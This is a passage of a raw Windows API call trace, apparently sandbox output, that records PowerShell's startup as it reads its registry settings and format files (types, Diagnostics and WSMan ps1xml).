	[0744.773] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.773] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.773] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.774] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.774] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.774] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.775] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.778] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.778] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.779] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.779] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.779] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.780] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.780] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.780] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.781] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.781] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.781] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.782] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.782] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.782] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.783] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.783] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.788] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.788] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.788] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.789] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.789] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.789] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.790] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.790] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.790] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x1b4, lpOverlapped=0x0) returned 1
	[0744.791] ReadFile (in: hFile=0x318, lpBuffer=0x2e5e120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2e5e120*, lpNumberOfBytesRead=0x14cfa8*=0x0, lpOverlapped=0x0) returned 1
	[0744.791] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d008 | out: phkResult=0x14d008*=0x318) returned 0x0
	[0744.791] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cf8c, lpData=0x0, lpcbData=0x14cf88*=0x0 | out: lpType=0x14cf8c*=0x1, lpData=0x0, lpcbData=0x14cf88*=0x56) returned 0x0
	[0744.791] CoTaskMemAlloc (cb=0x5a) returned 0x1b73da10
	[0744.791] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cf5c, lpData=0x1b73da10, lpcbData=0x14cf58*=0x56 | out: lpType=0x14cf5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cf58*=0x56) returned 0x0
	[0744.791] CoTaskMemFree (pv=0x1b73da10) 
	[0744.791] RegCloseKey (hKey=0x318) returned 0x0
	[0744.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0744.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0751.572] VirtualQuery (in: lpAddress=0x14bcf0, lpBuffer=0x14cbb0, dwLength=0x30 | out: lpBuffer=0x14cbb0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0755.435] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0755.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0755.435] CoTaskMemFree (pv=0x2b17f0) 
	[0755.451] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1a8 | out: phkResult=0x14d1a8*=0x2e0) returned 0x0
	[0755.451] RegQueryValueExW (in: hKey=0x2e0, lpValueName="path", lpReserved=0x0, lpType=0x14d1bc, lpData=0x0, lpcbData=0x14d1b8*=0x0 | out: lpType=0x14d1bc*=0x1, lpData=0x0, lpcbData=0x14d1b8*=0x74) returned 0x0
	[0755.451] RegQueryValueExW (in: hKey=0x2e0, lpValueName="path", lpReserved=0x0, lpType=0x14d12c, lpData=0x0, lpcbData=0x14d128*=0x0 | out: lpType=0x14d12c*=0x1, lpData=0x0, lpcbData=0x14d128*=0x74) returned 0x0
	[0755.451] CoTaskMemAlloc (cb=0x78) returned 0x2548b0
	[0755.452] RegQueryValueExW (in: hKey=0x2e0, lpValueName="path", lpReserved=0x0, lpType=0x14d0fc, lpData=0x2548b0, lpcbData=0x14d0f8*=0x74 | out: lpType=0x14d0fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d0f8*=0x74) returned 0x0
	[0755.452] CoTaskMemFree (pv=0x2548b0) 
	[0755.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0755.452] SetErrorMode (uMode=0x1) returned 0x1
	[0755.452] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d080 | out: lpFileInformation=0x14d080*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0755.452] SetErrorMode (uMode=0x1) returned 0x1
	[0755.453] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0755.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0755.453] CoTaskMemFree (pv=0x2b17f0) 
	[0755.455] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0755.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0755.455] CoTaskMemFree (pv=0x2b17f0) 
	[0755.456] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0755.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0755.456] CoTaskMemFree (pv=0x2b17f0) 
	[0755.456] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0755.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0755.456] CoTaskMemFree (pv=0x2b17f0) 
	[0755.457] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0755.457] GetFileType (hFile=0x314) returned 0x1
	[0755.457] SetErrorMode (uMode=0x1) returned 0x1
	[0755.457] GetFileType (hFile=0x314) returned 0x1
	[0755.457] ReadFile (in: hFile=0x314, lpBuffer=0x340bd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x340bd48*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0755.459] ReadFile (in: hFile=0x314, lpBuffer=0x340bd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x340bd48*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0755.460] ReadFile (in: hFile=0x314, lpBuffer=0x340bd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x340bd48*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0755.460] ReadFile (in: hFile=0x314, lpBuffer=0x340bd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x340bd48*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0755.461] ReadFile (in: hFile=0x314, lpBuffer=0x340bd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x340bd48*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0755.461] ReadFile (in: hFile=0x314, lpBuffer=0x340bd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x340bd48*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0755.461] ReadFile (in: hFile=0x314, lpBuffer=0x340bd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x340bd48*, lpNumberOfBytesRead=0x14cd18*=0x9e2, lpOverlapped=0x0) returned 1
	[0755.461] ReadFile (in: hFile=0x314, lpBuffer=0x340b292, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x340b292*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0755.462] ReadFile (in: hFile=0x314, lpBuffer=0x340bd48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x340bd48*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0755.462] CloseHandle (hObject=0x314) returned 1
	[0755.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0755.462] SetErrorMode (uMode=0x1) returned 0x1
	[0755.462] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14ccc0 | out: lpFileInformation=0x14ccc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0755.462] SetErrorMode (uMode=0x1) returned 0x1
	[0755.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0755.463] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cda8 | out: phkResult=0x14cda8*=0x314) returned 0x0
	[0755.463] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cd2c, lpData=0x0, lpcbData=0x14cd28*=0x0 | out: lpType=0x14cd2c*=0x1, lpData=0x0, lpcbData=0x14cd28*=0x56) returned 0x0
	[0755.463] CoTaskMemAlloc (cb=0x5a) returned 0x1b73da10
	[0755.463] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ccfc, lpData=0x1b73da10, lpcbData=0x14ccf8*=0x56 | out: lpType=0x14ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ccf8*=0x56) returned 0x0
	[0755.463] CoTaskMemFree (pv=0x1b73da10) 
	[0755.463] RegCloseKey (hKey=0x314) returned 0x0
	[0755.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0755.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0757.122] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xeac03299, Data2=0x3c99, Data3=0x4c55, Data4=([0]=0xa9, [1]=0x27, [2]=0xc4, [3]=0x59, [4]=0x12, [5]=0x0, [6]=0xea, [7]=0xd4))) returned 0x0
	[0757.127] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x546a4641, Data2=0x6e47, Data3=0x49f1, Data4=([0]=0xad, [1]=0xb4, [2]=0xf, [3]=0x69, [4]=0x1a, [5]=0x8, [6]=0xca, [7]=0x4d))) returned 0x0
	[0757.129] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0757.129] GetFileType (hFile=0x314) returned 0x1
	[0757.129] SetErrorMode (uMode=0x1) returned 0x1
	[0757.129] GetFileType (hFile=0x314) returned 0x1
	[0757.129] ReadFile (in: hFile=0x314, lpBuffer=0x34368b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x34368b0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0757.130] ReadFile (in: hFile=0x314, lpBuffer=0x34368b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x34368b0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0757.130] ReadFile (in: hFile=0x314, lpBuffer=0x34368b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x34368b0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0757.131] ReadFile (in: hFile=0x314, lpBuffer=0x34368b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x34368b0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0757.131] ReadFile (in: hFile=0x314, lpBuffer=0x34368b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x34368b0*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0757.139] ReadFile (in: hFile=0x314, lpBuffer=0x32aa198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32aa198*, lpNumberOfBytesRead=0x14cd18*=0xfb2, lpOverlapped=0x0) returned 1
	[0757.139] ReadFile (in: hFile=0x314, lpBuffer=0x32a98f2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32a98f2*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0757.139] ReadFile (in: hFile=0x314, lpBuffer=0x32aa198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32aa198*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0757.139] CloseHandle (hObject=0x314) returned 1
	[0757.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0757.140] SetErrorMode (uMode=0x1) returned 0x1
	[0757.140] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14ccc0 | out: lpFileInformation=0x14ccc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0757.140] SetErrorMode (uMode=0x1) returned 0x1
	[0757.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0757.140] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cda8 | out: phkResult=0x14cda8*=0x314) returned 0x0
	[0757.140] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cd2c, lpData=0x0, lpcbData=0x14cd28*=0x0 | out: lpType=0x14cd2c*=0x1, lpData=0x0, lpcbData=0x14cd28*=0x56) returned 0x0
	[0757.140] CoTaskMemAlloc (cb=0x5a) returned 0x1b73d150
	[0757.141] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ccfc, lpData=0x1b73d150, lpcbData=0x14ccf8*=0x56 | out: lpType=0x14ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ccf8*=0x56) returned 0x0
	[0757.141] CoTaskMemFree (pv=0x1b73d150) 
	[0757.141] RegCloseKey (hKey=0x314) returned 0x0
	[0757.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0757.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0757.142] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x4f2cc2e6, Data2=0x17f3, Data3=0x4d80, Data4=([0]=0x8f, [1]=0x3e, [2]=0xb5, [3]=0x1d, [4]=0x51, [5]=0x32, [6]=0x84, [7]=0xb9))) returned 0x0
